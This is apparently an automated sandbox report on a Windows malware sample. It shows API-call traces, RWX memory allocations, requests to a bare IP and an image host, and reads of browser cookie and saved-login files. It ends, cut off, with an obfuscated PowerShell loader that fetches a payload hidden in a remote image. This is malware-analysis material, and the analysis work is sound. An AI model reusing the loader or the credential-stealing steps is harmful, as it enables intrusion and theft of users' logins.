crypto_handle: 0x0028c300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0028c300
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039e578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039e5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039e5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039e5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039ee78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039ee78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039ee78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039ee78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039ee78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0039ee78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x8f0684
0x8f05e4
0x8f03e2
0x8f010b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7453f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8f392f
registers.esp: 3402920
registers.edi: 3402944
registers.eax: 0
registers.ebp: 3402956
registers.edx: 195
registers.ebx: 3403204
registers.esi: 39999792
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://141.98.6.91/windows/HNB.txt
suspicious_features GET method with no useragent header suspicious_request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
request GET http://141.98.6.91/windows/HNB.txt
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 2097152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02760000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02921000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02922000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028ce000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028cf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02901000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02902000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02903000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02904000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file C:\Users\test22\AppData\Local\Chromium\User Data
file C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -command "$Codigo = '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